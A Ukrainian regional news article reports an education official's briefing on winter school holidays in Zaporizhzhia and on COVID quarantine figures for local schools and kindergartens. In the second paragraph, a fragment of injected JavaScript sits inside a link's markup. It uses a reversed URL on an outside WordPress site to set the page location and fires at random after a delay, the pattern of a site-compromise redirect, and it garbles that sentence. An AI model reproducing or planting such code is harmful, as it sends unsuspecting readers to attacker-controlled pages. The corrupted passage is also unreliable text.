НовиниКоли в запорізьких школярів почнуться зимові канікули?

Коли в запорізьких школярів почнуться зимові канікули?

-

Коли в запорізьких школярів почнуться зимові канікули?

24 листопада відбувся брифінг директора Департаменту освіти й науки ЗОДА Віктора Захарчука щодо роботи закладів освіти області в умовах адаптивного карантину. Про це toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dochkiv-i-69,9-shkil-pratsjujut-u-zvichaynomu-rezhimi.html”>повідомили на сторінці пресцентру держустанови.

Відповідно до освітньої програми 2020-2021 навчального року зимові канікули орієнтовно передбачаються з 28.12.2020 року до 11.01.2021 року. Однак керівники та засновники закладів освіти можуть коригувати ці терміни на свій розсуд.

Також, за словами Віктора Захарчука, на сьогодні у звичайному режимі працюють 520 (98,5 %) закладів дошкільної освіти, 373 (69,9 %) заклади загальної середньої освіти та 70 (100%) закладів позашкільної освіти.

Карантинні заходи посилено у 4 дитсадках та в 91 групі 61 закладу дошкільної освіти, у зв’язку з захворюванням учасників освітнього процесу на коронавірусну хворобу. У 7 школах та в 75 класах 37 закладів середньої освіти карантинні заходи було посилено у зв’язку з захворюванням учасників освітнього процесу на COVID-19.

Наприкінці, Віктор Захарчук повідомив чи планується в школах та дитсадках проведення новорічних свят. Департамент освіти й науки облдержадміністрації не рекомендує взагалі відмовлятись від святкувань. Адже вони важливі для дітей з особливими освітніми потребами та дітей-сиріт. Активна участь в шкільних святах дає можливість соціалізації та розвитку творчих здібностей. Важливою умовою залишається проведення масових заходів з дотриманням усіх протиепідеміологічних вимог.

Коментарі

Варте уваги ПОВ'ЯЗАНІ
Рекомендовано Вам